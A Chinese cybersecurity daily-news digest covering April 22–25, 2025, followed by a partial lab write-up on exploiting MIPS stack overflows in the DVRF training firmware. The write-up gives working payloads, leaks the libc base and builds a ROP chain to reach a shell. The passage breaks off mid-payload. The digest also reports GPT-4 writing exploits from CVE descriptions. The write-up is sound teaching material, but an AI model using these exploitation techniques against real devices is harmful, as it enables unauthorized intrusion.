网络安全日报 2025年04月25日
1、黑客组织UNC2428借虚假招聘投递MURKYTOUR后门
https://thehackernews.com/2025/04/iran-linked-hackers-target-israel-with.html 2025年4月23日,研究人员披露伊朗黑客组织UNC2428于2024年10月对以色列发起钓鱼攻击。攻击者伪装成以色列国防承包商Rafael的招聘人员,通过虚假职位诱骗目标下载名为"RafaelConnect.exe"的恶意安装程序(LONEFLEET)。该程序呈现仿真的图形界面(GUI)诱导受害者填写个人信息,实则暗中部署MURKYTOUR后门,并通过LEAFPILE启动器维持持久化访问。
2、研究人员发现针对俄罗斯军方的Android间谍软件
https://securityaffairs.com/176886/malware/android-spyware-hidden-in-mapping-software-targets-russian-soldiers.html 2025年4月24日,研究人员发现针对俄罗斯军方的Android间谍软件。该恶意代码被植入篡改版Alpine Quest地图应用,通过俄罗斯第三方应用商店传播。间谍软件可窃取通讯录、定位数据及设备文件,并支持远程下载附加模块。攻击者利用俄军人员对专业地形规划软件的需求,将恶意程序伪装成"Alpine Quest Pro"高级功能免费版分发。
3、Docker环境成为加密挖矿活动目标
https://securityaffairs.com/176877/malware/crypto-mining-campaign-targets-docker-environments-with-new-evasion-technique.html 2025年4月23日,研究人员披露针对Docker环境的恶意挖矿活动。攻击者利用Docker Hub上的"kazutod/tene:ten"镜像部署恶意节点,连接至去中心化基础设施网络Teneo。该恶意软件通过运行社区节点,秘密抓取Facebook、X(原Twitter)、Reddit及TikTok等社交平台公开数据以获取Teneo积分(可兑换
4、2025年第一季度159个CVE漏洞遭利用28.3%在披露24小时内被攻击
https://www.freebuf.com/articles/network/428660.html 2025年第一季度共有159个CVE编号漏洞被确认在野利用,较2024年第四季度的151个有所上升。网络安全公司VulnCheck向《黑客新闻》提供的报告指出:"我们发现漏洞利用速度持续加快,28.3%的漏洞在其CVE披露后24小时内就遭到利用。"这意味着有45个安全漏洞在公开披露当天就被用于实际攻击。另有14个漏洞在一个月内遭利用,还有45个漏洞在一年内被滥用。
5、Google Forms被恶意利用,多行业面临凭证泄露风险
https://www.anquanke.com/post/id/306858 Google Forms — 科技巨头广受欢迎的调查工具,已成为网络犯罪分子武器库中的得力工具。它使犯罪分子能够绕过复杂的电子邮件安全过滤器,并获取敏感的用户凭证。
6、XRPL官方NPM包遭恶意篡改,私钥窃取威胁波及数十万加密货币应用
https://www.anquanke.com/post/id/306856 一场针对加密货币用户的重大供应链攻击事件发生了。XRP Ledger 的 JavaScript SDK 的官方 XRPL NPM 包遭到了恶意代码的篡改,这些恶意代码旨在窃取加密货币的私钥,有可能影响到成千上万的应用程序。
7、Redis高危漏洞CVE-2025-21605,多版本补丁紧急修复
https://www.anquanke.com/post/id/306847 在广受欢迎的开源内存数据结构存储系统 Redis 中发现了一个严重高危漏洞,该漏洞可能使未经身份验证的用户耗尽服务器内存,并导致拒绝服务(DoS)情况的发生。这个漏洞被追踪编号为 CVE-2025-21605,影响从 2.6 版本起的所有 Redis 版本,通用漏洞评分系统(CVSS)评分为 7.5 分。
8、Grafana 高危漏洞可致关键业务数据泄露
https://www.anquanke.com/post/id/306841 Grafana Labs 已针对多个产品版本发布了安全更新,修复了一个高危和两个中危级别的漏洞,这些漏洞影响了Grafana OSS 和 Grafana Enterprise。其中最严重的漏洞是 CVE-2025-3260,通用漏洞评分系统(CVSS)评分为 8.3(高危),该漏洞可能导致未经授权的用户访问和修改仪表盘,即使是权限极低的用户也能做到。
9、Linux 'io_uring' 安全盲点允许隐蔽的后门攻击
https://www.bleepingcomputer.com/news/security/linux-io-uring-security-blindspot-allows-stealthy-rootkit-attacks/ Linux 运行时安全中的一个重大安全漏洞由'io_uring'接口引起,允许根 kit 在系统上运行而不被高级企业安全软件检测到,从而绕过安全防护。
10、黑客利用OAuth 2.0工作流劫持Microsoft 365账户
https://www.bleepingcomputer.com/news/security/hackers-abuse-oauth-20-workflows-to-hijack-microsoft-365-accounts/ 俄罗斯威胁行为者一直在利用合法的 OAuth 2.0 身份验证工作流劫持与乌克兰和人权组织相关的组织的员工的 Microsoft 365 账户。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年04月24日
1、俄机构遭伪装成ViPNet软件更新包的后门攻击
https://securelist.com/new-backdoor-mimics-security-software-update/116246/ 2025年4月22日,研究人员发现一起针对俄罗斯政府、金融及工业领域大型机构的复杂网络攻击。攻击者将后门程序伪装成ViPNet安全网络软件的更新包(LZH压缩格式),通过该软件的更新渠道进行传播。ViPNet是俄罗斯广泛使用的安全组网解决方案,此次攻击利用其信任链实施供应链攻击。该后门可控制受感染主机,但攻击者的具体意图尚在调查中。
2、SK电讯遭恶意攻击致用户USIM数据泄露
https://securityaffairs.com/176802/data-breach/sk-telecom-data-breach.html 2025年4月22日,韩国最大电信运营商SK电讯(SK Telecom)遭遇恶意软件攻击,导致客户通用用户识别模块(USIM)数据外泄。USIM卡存储包括国际移动用户识别码(IMSI)及加密密钥在内的关键用户信息。SK电讯在发现入侵后立即向韩国互联网振兴院(KISA)报告,并于4月20日对受影响系统进行清理隔离。
3、MalenuStealer木马利用Discord平台实施网络钓鱼
https://www.binarydefense.com/resources/blog/a-look-at-a-novel-discord-phishing-attack/ 2025年4月22日,研究人员披露一种通过Discord平台传播的窃密木马MalenuStealer。攻击者利用已入侵的Discord账号向好友发送伪装成"游戏测试邀请"的钓鱼消息,诱导用户下载所谓"测试版游戏",实则植入恶意软件。该木马专门窃取受害者的账号密码、支付信息等敏感数据。
4、SSL的.com站漏洞允许主要域名使用欺诈性SSL证书
https://hackread.com/ssl-com-vulnerability-fraud-ssl-certificates-domains/ 2025年4月22日,研究人员披露SSL.com存在严重漏洞,攻击者可利用其电子邮件验证机制的缺陷,为任意主要域名签发合法SSL/TLS证书。该问题源于SSL.com的域名控制验证(DCV)流程缺陷,SSL证书是保障HTTPS加密通信的核心,而证书颁发机构(CA)的信任体系一旦被破坏,可能导致中间人攻击、钓鱼网站仿冒等风险。目前SSL.com已紧急修复该漏洞,但尚未公布受影响证书的吊销情况。
5、新型恶意软件采用独特混淆技术劫持Docker镜像
https://www.freebuf.com/articles/428513.html 安全研究人员发现新型恶意软件正在攻击Docker环境,该软件采用复杂的多层混淆技术逃避检测,通过劫持计算资源进行加密货币挖矿(cryptojacking)。
6、三星One UI安全漏洞:剪贴板数据明文存储且永不过期
https://cybersecuritynews.com/samsung-one-ui-security-flaw/ 三星One UI系统存在重大安全漏洞,剪贴板数据以明文永久存储,包括密码等敏感信息,且无自动删除机制。攻击者可轻易获取数据,建议手动清除或使用自动填充功能。该问题多年未解决,引发用户强烈担忧。
7、谷歌云Composer漏洞允许攻击者提升权限
https://cybersecuritynews.com/google-cloud-composer-vulnerability/ 谷歌云平台(GCP)的Cloud Composer服务存在"ConfusedComposer"权限提升漏洞,攻击者可通过注入恶意PyPI包获取高权限服务账户控制权。谷歌已修复该漏洞,改用更安全的服务账户执行安装操作,并更新相关文档。
8、伪装成Alpine Quest的恶意地图应用被曝监控俄军动向
https://hackread.com/fake-alpine-quest-mapping-app-spying-russian-military/ 伪造Alpine Quest应用植入间谍软件,窃取俄军定位数据、通讯录及文件。通过Telegram传播,伪装为"专业版",可远程扩展功能。建议避免非官方渠道下载,警惕模块化恶意软件。幕后组织尚未确认。
9、"Cookie-Bite"攻击手法可绕过多重验证并维持持久访问权限
https://cybersecuritynews.com/cookie-bite-attack/ 网络安全研究人员发现"Cookie-Bite"攻击技术,通过窃取浏览器cookie绕过MFA保护,持久访问云环境。攻击者利用中间人攻击、恶意扩展等手段窃取会话令牌,无需凭证即可冒充用户。建议企业监控异常行为、限制浏览器扩展并部署令牌保护机制应对威胁。
10、GPT4在公开漏洞利用代码发布前成功生成CVE有效攻击程序
https://cybersecuritynews.com/chatgpt-creates-working-exploit-for-cves/ AI成功生成高危漏洞攻击程序,改写网络安全格局。GPT-4仅凭CVE描述即完成代码分析、漏洞定位、攻击编写及调试全过程,大幅缩短漏洞利用开发时间。这一突破既提升研究效率,也加剧安全风险,迫使组织加速补丁部署。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年04月23日
1、Kimsuky APT利用BlueKeep漏洞攻击日韩
https://securityaffairs.com/176756/apt/kimsuky-apt-exploited-bluekeep-rdp-flaw-in-attacks-against-south-korea-and-japan.html 2025年4月21日,韩国AhnLab研究人员发现,朝鲜背景的APT组织Kimsuky(追踪代号Larva-24005)近期利用已修补的Microsoft远程桌面协议(RDP)漏洞BlueKeep(CVE-2019-0708)入侵目标系统。此外,Kimsuky还通过钓鱼邮件及Microsoft Office Equation Editor漏洞(C
2、黑客利用WinDbg Preview绕过Windows Defender防护
https://gbhackers.com/hackers-bypassed-windows-defender-policies 2025年4月21日,研究人员披露,攻击者可利用WinDbg Preview调试工具绕过Windows Defender应用程序控制(WDAC)策略。该漏洞被称为为"WinDbg Preview Exploit",利用调试器的高级功能执行代码并实现远程进程注入,成功规避了企业环境中针对未签名或未授权代码的防护措施。
3、黑客兜售可绕过主流AV/EDR的"Baldwin Killer"恶意工具
https://gbhackers.com/hackers-claim-to-sell-baldwin-killer-malware/ 2025年4月21日,某知名威胁攻击者在暗网论坛公开出售名为"Baldwin Killer"的高级恶意软件工具包。据称该工具能够有效绕过包括Windows Defender、卡巴斯基、Bitdefender和Avast在内的主流杀毒软件及终端检测响应(EDR)系统。安全专家对此表示高度关注,认为该工具的出现可能显著降低攻击门槛,使更多威胁行为者能够突破企业基础安全防护。
4、WordPress恶意插件日均生成14亿广告请求
https://www.bleepingcomputer.com/news/security/scallywag-ad-fraud-operation-generated-14-billion-ad-requests-per-day/ 2025年4月,安全公司HUMAN曝光一起代号"Scallywag"的大规模广告欺诈活动。攻击者通过定制WordPress插件,在盗版和URL缩短网站上植入恶意代码获利,最高峰时每日产生14亿次虚假广告请求。经调查,该犯罪网络涉及407个域名,通过伪造广告展示和点击非法牟利。
5、HPE集群管理器被发现允许远程绕过身份验证
https://cybersecuritynews.com/hpe-performance-cluster-manager-vulnerability/ 2025年4月22日,研究人员在HPE Performance Cluster Manager(HPCM)中发现一个高危认证绕过漏洞(CVE-2025-27086)。该漏洞存在于HPCM图形用户界面(GUI)的远程方法调用(RMI)通信机制中,影响包括1.12版本在内的所有HPCM版本。攻击者可利用此漏洞远程绕过身份验证机制,直接访问受保护的系统资源。HPE已获知该漏洞详情,建议使用HPCM的企业立即采取缓解措施。
6、严重性10分的Erlang SSH漏洞已出现公开利用代码
https://www.freebuf.com/articles/ics-articles/428263.html 网络安全专家正紧急呼吁企业立即修复Erlang/OTP安全外壳(SSH)协议中的一个高危漏洞(CVE-2025-32433)。该远程代码执行(RCE)漏洞的CVSS评分为满分10分,攻击者无需认证即可完全控制受影响设备。该漏洞于4月16日被发现后,研究人员已迅速开发出利用代码。
7、新型钓鱼攻击:SVG文件中植入恶意HTML文件
https://www.freebuf.com/articles/web/428247.html 网络安全专家发现了一种利用SVG(可缩放矢量图形)文件格式的新型钓鱼技术,攻击者通过该技术向不知情的受害者投递恶意HTML内容。这种于2025年初首次被发现的威胁手段,标志着钓鱼战术的显著升级——攻击者利用SVG文件的双重特性绕过安全防护措施,诱骗用户泄露敏感信息。
8、RustoBot利用路由器漏洞发动DDoS跨境攻击
https://www.anquanke.com/post/id/306777 FortiGuard Labs 最近发现了名为 RustoBot 的恶意程序,它是用 Rust 语言编写的。Rust 是一种以性能和安全性著称的内存安全型语言。RustoBot 是一个复杂的僵尸网络,它利用了 TOTOLINK 和 DrayTek 路由器中的漏洞,从而在日本、越南和墨西哥的技术基础设施中占据了一席之地。
9、美国美中委员会发布DeepSeek调查报告称其威胁美国国家安全
https://www.secrss.com/articles/77880 近日,美国美中战略竞争特别委员会发布了一份DeepSeek调查报告,指控DeepSeek涉嫌数据窃取、信息操控、技术盗用及规避美国出口管制,威胁美国国家安全。
10、 高危Windows更新堆栈漏洞可导致代码执行与权限提升
https://cybersecuritynews.com/windows-update-stack-vulnerability/ 微软Windows更新堆栈高危漏洞CVE-2025-21204允许攻击者通过操控更新流程获取SYSTEM权限,影响Win10/11及Server多个版本。漏洞利用文件系统信任而非内存破坏,传统工具难检测。微软已发布补丁修复,建议立即更新并限制相关目录访问。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年04月22日
1、FOG勒索软件伪装DOGE发起钓鱼攻击
https://cybersecuritynews.com/new-fog-ransomware-attack-mimic-as-doge-attacking-organization/ 2025年4月21日,研究人员发现,FOG勒索软件攻击活动呈现新型攻击特征,攻击者伪装成美国"政府效率部(DOGE)"名义实施社会工程攻击。该活动通过精心制作的钓鱼邮件进行传播,邮件附件伪装成政府公文,当受害者点击该附件后,会启动复杂的感染链,从而导致数据加密和勒索要求。
2、Google OAuth被利用于伪造DKIM认证钓鱼邮件
https://www.bleepingcomputer.com/news/security/phishers-abuse-google-oauth-to-spoof-google-in-dkim-replay-attack/ 2025年4月20日,研究人员披露,在一起网络钓鱼攻击中,攻击者通过利用Google OAuth授权流程与邮件协议漏洞,构造了显示发件人为"no-reply@google.com"的欺诈邮件。该邮件利用DKIM签名验证机制缺陷,在通过常规反垃圾邮件检测的同时,将用户重定向至攻击者控制的仿冒Google支持页面,诱导受害者提交账户凭证。
3、GitHub针对企业产品版发布紧急安全更新
https://cybersecuritynews.com/github-enterprise-server-vulnerabilities/ 2025年4月21日,GitHub针对企业版产品发布紧急安全更新,修复包含关键远程代码执行漏洞(CVE-2025-3509)在内的多个安全缺陷,该漏洞影响3.13.0至3.16.1版本。攻击者可通过构造恶意HTTP请求在服务端执行任意命令,同时结合跨站脚本漏洞(CVE-2025-3511)窃取私有仓库访问令牌及敏感代码资产。
4、Facebook开发的PyTorch模型被发现存在RCE漏洞
https://securityonline.info/critical-pytorch-vulnerability-cve-2025-32434-allows-remote-code-execution/ 2025年4月21日,研究人员披露,PyTorch深度学习框架存在远程命令执行(RCE)漏洞(CVE-2025-32434),该漏洞影响2.5.1版本之前的PyTorch。如果攻击者利用此缺陷制作了一个模型文件,他们就可以在目标计算机上执行任意命令,这可能导致数据泄露、系统泄露,甚至在云托管的 AI 环境中横向移动。目前PyTorch已在发布2.6版本修复该漏洞,
5、Meshtastic开源通信协议栈存在远程代码执行漏洞
https://securityonline.info/critical-meshtastic-rce-vulnerability-cve-2025-24797-requires-urgent-update/ 2025年4月21日,研究人员披露,Meshtastic开源通信协议栈存在远程代码执行漏洞(CVE-2025-24797),该漏洞影响固件版本2.6.2之前的所有设备。该漏洞源于不正确地处理含有无效协议缓冲区(protobuf)数据错误格式的网状数据包。受影响设备涉及基于ESP32、nRF52等硬件平台的便携式节点设备,主要应用于野外救援、灾害应急通信等离网场景。Meshtastic官
6、新型恶意软件"超级卡X"通过NFC中继攻击瞄准安卓设备
https://www.freebuf.com/articles/428204.html Cleafy安全研究人员发现名为"超级卡X"(SuperCard X)的新型恶意软件即服务(MaaS),该恶意软件通过NFC(近场通信)中继攻击针对安卓设备实施资金窃取。
7、朝鲜APT组织利用实时深度伪造技术通过远程工作渗透组织
https://www.freebuf.com/articles/ai-security/428243.html 网络安全渗透手段出现令人担忧的新发展——朝鲜APT组织开始在远程工作面试中使用复杂的实时深度伪造(deepfake)技术,以此获取全球各地组织的职位。
8、 微软Entra新安全功能引发大规模账户锁定事件
https://www.bleepingcomputer.com/news/microsoft/widespread-microsoft-entra-lockouts-tied-to-new-security-feature-rollout/ 微软Entra ID新功能"MACE"部署故障引发大规模误报,导致大量用户账户被锁定。受影响账户未现入侵迹象且启用了MFA,微软确认问题源于静默部署的凭证撤销应用。建议管理员排查异常警报。
9、Qrator Labs成功抵御今年最大规模DDoS攻击 峰值达965Gbps
https://hackread.com/qrator-labs-mitigating-largest-ddos-attack-to-date/ 2025年4月,Qrator Labs成功抵御峰值965 Gbps的DDoS攻击,创年度纪录。攻击针对相关在线平台,与NHL球星破纪录进球时间重合,采用多向量复合模式。研究显示体育赛事期间相关平台成高危目标,企业需提前强化防护。
10、Interlock 勒索软件肆虐,全球企业面临数据加密与泄露双重风险
https://www.anquanke.com/post/id/306737 Sekoia 威胁检测与研究团队(TDR)的一份新报告详细阐述了 Interlock 勒索软件的入侵活动。Interlock 首次被发现于 2024 年 9 月,以实施 Big Game Hunting 和双重勒索活动而闻名。尽管它不被归类为勒索软件即服务(RaaS)组织,但 Interlock 运营着一个名为 Worldwide Secrets Blog 的数据泄露网站,以此向受害者施压。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
MIPS栈溢出漏洞实战解析:从DVRF题目看ROP链构造
前言
最近导师要搞IOT漏洞挖掘项目,我得找找IOT学习资料,DVRF就适合IOT设备漏洞挖掘从入门到入坟....(bushi
固件分析
Squashfs系统,还是小端序,提取一下文件
有漏洞的程序在pwnable目录下
不过DVRF里面还附带有程序的源码,所以我们先看看源码,再来看二进制程序
题目
stack_bof_01
乍一看,strcpy()和system()都有,buff叠满了,细一看system()函数是固定字符串,应该不会造成命令注入漏洞,因为已经把控制参数都给写好了(什么地狱笑话),直接留了个后门,所以只剩下strcpy()这个常见的栈溢出漏洞函数,没有对输入的内容限制长度,所以有栈溢出。buf一共200字节长度,只要argv[]这个我们可控的参数长度超过200就可以覆盖掉buf,然后劫持函数执行流到system("/bin/sh -c")这个后门函数即可
先checksec检查二进制文件信息
什么都没有,城门大开,并且是mips32位小端序,所以要模拟起来的话,需要qemu-mipsel,考虑到动态链接经常出幺蛾子,所以直接搞个静态的,即qemu-mipsel-static到固件的根目录下,
然后开启模拟
sudo chroot . ./qemu-mipsel-static ./pwnable/Intro/statck_bof_01
一开始以为显示的是缺少参数东西,检查了好久检查不出个所以然,后来才反应过来这是要在后面输入东西,然后就看见模拟成功跑起来了
那接下来我们需要得到一个偏移量,即argv[]参数到寄存器R31也就是$ra的偏移量,要么静态IDA查看计算一番,不过有可能会不准,所以直接一劳永逸用动态调试来计算好了
首先开启一个端口8888
sudo chroot . ./qemu-mipsel-static -g 8888 ./pwnable/Intro/statck_bof_01
然后另起一个窗口,开启动态调试
gdb-multiarch stack_bof_01
set architecture mips
target remote 127.0.0.1:8888
进来pwndbg初始状态
由于一开始已经在main函数里,所以直接n单步步过到strcpy函数,按理说这个流程应该没错,但是不知道是不是pwndbg自身的问题,一直报错
排查了一天也不知道怎么解决,后来网上找了一个黑盒测试的方法
主要用于 调试 MIPS 架构的缓冲区溢出漏洞
ulimit -c unlimited #启用核心转储(core dump)功能,并解除大小限制,当程序崩溃,比如说段错误时,系统会生成一个 core 文件,记录崩溃时的内存状态,如寄存器、堆栈等 此命令确保 core 文件能被完整生成
sudo bash -c 'echo %e.core.%p > /proc/sys/kernel/core_pattern' #设置核心转储文件的命名格式,方便后续调试时快速定位对应的崩溃文件
sudo chroot . ./qemu-mipsel-static ./pwnable/Intro/stack_bof_01 `cyclic 1000` #在 chroot 环境中,使用 QEMU 用户态模拟器运行 MIPS 小端序程序,并触发崩溃,程序因缓冲区溢出崩溃,生成 core 文件
sudo gdb-multiarch ./pwnable/Intro/stack_bof_01 ./qemu_stack_bof_01_20250406-074606_5214.core -q #使用支持多架构的 GDB 加载程序及其核心转储文件进行调试,查看崩溃时的寄存器状态,比如说$pc 的值,确定溢出点偏移量
cyclic -l 0x63616162 #通过崩溃时覆盖的地址,这里是0x63616162,反推溢出点偏移量 cyclic 工具生成一个 唯一递增的 4 字节模式字符串 比如说aaaabaaacaaadaaa...当程序崩溃时,若寄存器的值是 0x63616162(对应 ASCII baac,注意小端序),则执行cyclic -l 0x63616162 该值在模式字符串中的偏移量,即溢出点到返回地址的偏移
说白了,整个调试模式流程如下:
生成崩溃:通过 cyclic 字符串触发程序崩溃,生成 core 文件
定位偏移:用 cyclic -l <地址> 计算偏移量
构造 Payload:根据偏移量构造 填充数据 + 目标地址 的利用载荷
重新触发:用构造的 Payload 替换 cyclic 字符串,验证漏洞利用
学到了学到了
所以我们得到了偏移204的位置覆盖了返回地址,所以我们要先覆盖204个字节长度(这里不用再加上4个字节长度的寄存器了,因为204就已经包括了寄存器了),然后再加上程序自己留的后门函数system("/bin/sh -c")的地址,就可以完成一次攻击劫持流
由IDA可知,后门函数地址为0x00400950,并且要注意这里是小端序的写法,所以payload为
sudo chroot ./ ./qemu-mipsel-static -g 1234 ./pwnable/Intro/stack_bof_01 `python -c 'print(b"a"*204 + b"\x50\x09\x40\x00")'`
由于pwndbg动态调试的时候出现异常,所以这里改为用IDA进行远程动态调试
不出意外崩了,毫不意外呢....
根据技术文档分析,程序崩溃的根源与MIPS架构特性直接相关
在缓冲区溢出攻击场景中,全局指针寄存器$gp被覆盖是触发异常的核心因素。该寄存器负责维护全局数据区的基址定位,其值被破坏后,程序无法通过偏移计算正确访问全局变量或静态存储区,最终因寻址错误,比如说访问非法内存地址,导致崩溃
进一步结合漏洞利用流程,MIPS的函数执行机制要求$t9寄存器必须指向当前函数的入口地址,这是指令集中对函数跳转和数据索引的硬性规范。例如,调用dat_shell函数时,若$t9未正确指向其起始地址,代码将无法解析函数内的相对偏移,进而引发执行流紊乱
t9 寄存器总是保存的是函数的开头地址,若通过控制 ra 直接劫持到目标函数,t9 寄存器没有变化,还是原来调用过的函数的地址
所以需要调用 ROP 来设置一次 t9 寄存器的地址为后门地址,进而 jr $t9,才能使得 gp 寄存器正确的寻址
而且这里不能用 python -c 命令作为命令行参数传进去,因为在 python 输出过程中会被截断
因此,完整的利用链需分两步完成:首先通过ROP gadget精准设置$t9寄存器的值,使其符合目标函数dat_shell的入口地址,再通过控制流劫持跳转至目标函数,从而绕过MIPS架构的寄存器约束,实现稳定攻击
所以现在首要目标就是要找到一个gadgets,可以跳转到$t9寄存器,然后修改返回地址到 rop_gadget, 设置 $t9 为 dat_shell 函数的地址,跳转到 dat_shell 函数,执行system,在原程序中没有找到跳转到$t9的gadget
在DVRF固件所提供的文件libc.so.0中刚好能找到我们想要的gadget
但是这不是真正的地址,我们得去找到libc的基地址再加上0x6b20才是我们所以填写到payload中的地址
所以现在问题又变成了怎么找到libc的基地址,因为从ida来看,并没有@plt表,所以通过泄露一些在程序中已被调用的函数的地址,通过其在程序运行起来的地址减去在libc.so.0内的地址从而得到libc的基地址
那我们就用这个第一个的memset函数,在libc.so.0的地址为0001BE10
ida在memset下个断点,然后远程动态调试
找到memset在执行的时候的真正地址,为0x7F700E10
libc_base=0x7F700E10-0x0001be10=0x7f6e5000
gadget地址为=0x7f6e5000+0x6b20=0x7F6EBB20
sudo chroot . ./qemu-mipsel-static ./pwnable/Intro/stack_bof_01 "$(python -c "print 'A'*204 + '\x20\xbb\x6e\x7f\x50\x09\x40\x00'")"
我看网上还有一种方法,因为dat_shell的首地址在0x00400950,但是直接跳过去的话又会发生崩溃,所以在0x00400950处下一个断点,看看到底咋回事
可以看到经过三次单步步过之后,gp寄存器指向了一块不知名且无法访问的内存空间
而gp寄存器在MIPS中$gp是 全局指针寄存器,用于高效访问静态数据区,比如说全局变量、常量等
程序启动时,$gp 由运行时环境,比如说启动代码设置为指向 .got或数据段中间位置。
当$gp指向了一块不知名且无法访问的内存区域时,通常意味着程序在初始化、链接或运行时逻辑中存在严重问题,也有可能时$gp 本应在程序生命周期内保持恒定,但若代码中错误地修改了 $gp,比如说如误将其用作临时寄存器),会导致后续全局数据访问失败
总之既然直接跳转到0x00400950会发生错误,那根据上述的调试可知,只要绕过前面三步单步步过就可以了,所以把payload地址修改为0x0040095c
sudo chroot . ./qemu-mipsel-static ./pwnable/Intro/stack_bof_01 "$(python -c "print 'A'*204 + '\x5c\x09\x40\x00'")"
又get一种黑科技写法
这道题最重要的就是学到$t9寄存器的值是MIPS程序的函数的起始地址,这对rop链构造是至关重要的
stack_bof_02
先看源码
这一漏洞的本质仍属于典型的栈溢出攻击场景
程序通过命令行参数获取输入数据,在利用strcpy函数进行数据复制时,由于未对参数长度进行有效性校验,导致超出目标缓冲区的容量边界,从而引发栈空间溢出
而且,根据《揭秘家用路由器0day漏洞挖掘技术》书中所写到,main函数在MIPS架构中被归类为非叶子函数,这意味着其栈帧中会保存返回地址寄存器$ra
当溢出发生时,就可以通过构造的输入数据覆盖栈上存储的$ra值,当main函数执行完毕并尝试通过jr $ra返回时,程序流将被劫持到被篡改的地址
不过跟上一道相比,少了后门函数
因此,我们需要通过注入Shellcode到栈或寄存器中,并将$ra覆盖为Shellcode的起始地址,从而在程序返回时触发攻击代码的执行
检查一下文件,发现啥保护都没有,32小端序
模拟,启动!
sudo chroot . ./qemu-mipsel-static ./pwnable/ShellCode_Required/stack_bof_02
这已经明示了要弄shellcode了
动态调试还是不行啊...搞不定,用用黑盒测试
要覆盖508个字节长度
准备构造ROP
由于MIPS采用流水线指令集架构,其存在cache incoherency特性,因此在跳转到shellcode之前必须调用sleep等函数将数据区刷新至当前指令区,这样才能保证shellcode的正常执行
流水线指令集架构
是一种通过并行化处理指令执行过程来提高处理器效率的设计方法。其核心思想是将指令的执行过程划分为多个独立的阶段
比如说取指、译码、执行、访存、写回等
每个阶段由专门的硬件单元处理,不同阶段的指令可以同时执行,从而形成类似“工厂流水线”的工作模式
典型的流水线分为以下阶段(以经典5级流水线为例):
取指(IF):从内存中读取指令。
译码(ID):解析指令的操作码和操作数。
执行(EX):执行算术或逻辑运算。
访存(MEM):访问内存(如加载或存储数据)。
写回(WB):将结果写回寄存器。
每个阶段完成后,指令会传递到下一阶段,同时新的指令进入当前阶段。例如:
第1条指令处于写回阶段时,
第2条指令可能处于访存阶段,
第3条指令处于执行阶段,
...
举个例子
ADD R1, R2, R3 #R1 = R2 + R3,算术运算
LW R4, 0(R1) #从内存地址R1+0加载数据到R4,访存操作
SUB R5, R4, R6 # R5 = R4 - R6,依赖第2条指令的R4结果
BEQ R5, R0, LABEL #若R5 == 0,跳转到LABEL,分支指令
所以,我们需要在跳转前调用 sleep(1) 刷新指令缓存,而sleep函数将参数存放在$a0寄存器中,所以我们在libc.so.0中寻找我们所要的gadget
随便选一个了,选了第二个,且gadget的末尾是跳转到$s1寄存器,先到0x0002fb10地址查看一番
由图所示,我们还要找到可以控制$s1的gadget,以便覆盖数据的时候可以覆盖掉$s1寄存器
但是在main函数中没有出现类似 lw $s0, offset($sp) 的指令,意味着该函数未主动恢复保存寄存器($s0−$s7)的值
函数内部使用了($s0-$s7)这些寄存器,需在函数开头将其保存到栈中(sw $sN, offset($sp)),并在返回前恢复(lw $sN, offset($sp))。
而临时寄存器($t0-$t9)无需保存,调用者需假设其值在函数调用后可能被破坏。
若main函数未使用s0−s7,则无需在栈帧中保存/恢复这些寄存器,因此末尾不会有lw $s0, offset($sp)类指令。
所以由于main函数末尾没有lw $s1, offset($sp),攻击者无法通过覆盖栈上保存的$s1旧值来直接控制该寄存器。
所以,无法直接控制$s1寄存器
需通过其他途径间接控制$s1,比如说,利用其他函数中的gadget恢复$s1,或者是通过数据传递链,比如move指令,将可控寄存器的值传递到$s1
所以还是通过mipsrop.find("lw $s1")找到了一些gadget 0x00006A50
理一下逻辑,使用gadget2=0x00006A50这段gadget设置好寄存器,修改好$s1的值,然后使用gadget1=0x0002FB10这段gadget去刷新数据区
同时还是要找到libc的地址,由上一题可知,libc基地址为0x7f6e5000
所以gadget1=0x7f6e5000+0x0002fb10=0x7f714b10
gadget2=0x00006a50+0x7f6e5000=0x7f6eba50
并且由ida可知调整shellcode的位置为0x58
gadget1=0x7f714b10
gadget2=0x7f6eba50
payload="a"*508
payload+=p32(gadget2)
payload+="a"*0x58
payload+="aaaa" #覆盖s0
payload+="aaaa" #覆盖s1
payload+="aaaa" #覆盖s2
payload+=p32(gadget1)
由ida可知,sleep静态地址为0x0002F2B0,再加上libc_addr的话就为0x7F7142B0
但是不能把sleep地址直接写到s1上,因为当这里填入sleep函数的地址后,程序会直接跳转执行sleep函数,但由于$ra寄存器仍保留着gadget1的地址,在sleep函数执行完毕后又会重新返回到当前位置。因此,需要寻找一个具备双重功能的gadget3——它既能通过s0或s2寄存器实现跳转控制,同时又能够对ra寄存器进行重新赋值,通过mipsrop.tail()找到的gadget3 0x00020F1C+libc_addr=0x7f705f1c
gadget1=0x7f714b10
gadget2=0x7f6eba50
gadget3=0x7f705f1c
sleep_addr=0x7f7142b0
payload="a"*508
payload+=p32(gadget2)
payload+="b"*0x58
payload+="cccc" #覆盖s0
payload+=p32(gadget3) #覆盖s1
payload+=p32(sleep)#覆盖s2,写入sleep
payload+=p32(gadget1)
payload+="c"*0x18 #gadget3需要调整的shellcode位置的字节码
payload+="aaaa"#覆盖$s0
payload+="aaaa"#覆盖$s1
payload+="aaaa"#覆盖$s2
payload+="aaaa"#覆盖$ra
sleep函数执行完之后,得找一个可以跳转的地址,并且在那上面可以写shellcode
不过没有找到,在师傅建议下,找了一个可以先控制寄存器上的值,再跳转到这里,通过mipsrop.stackerfind(),gadget4=0x00016dd0+libc_addr=0x7f6fbdd0
gadget1=0x7f714b10
gadget2=0x7f6eba50
gadget3=0x7f705f1c
gadget4=0x7f6fbdd0
sleep_addr=0x7f7142b0
payload="a"*508
payload+=p32(gadget2)
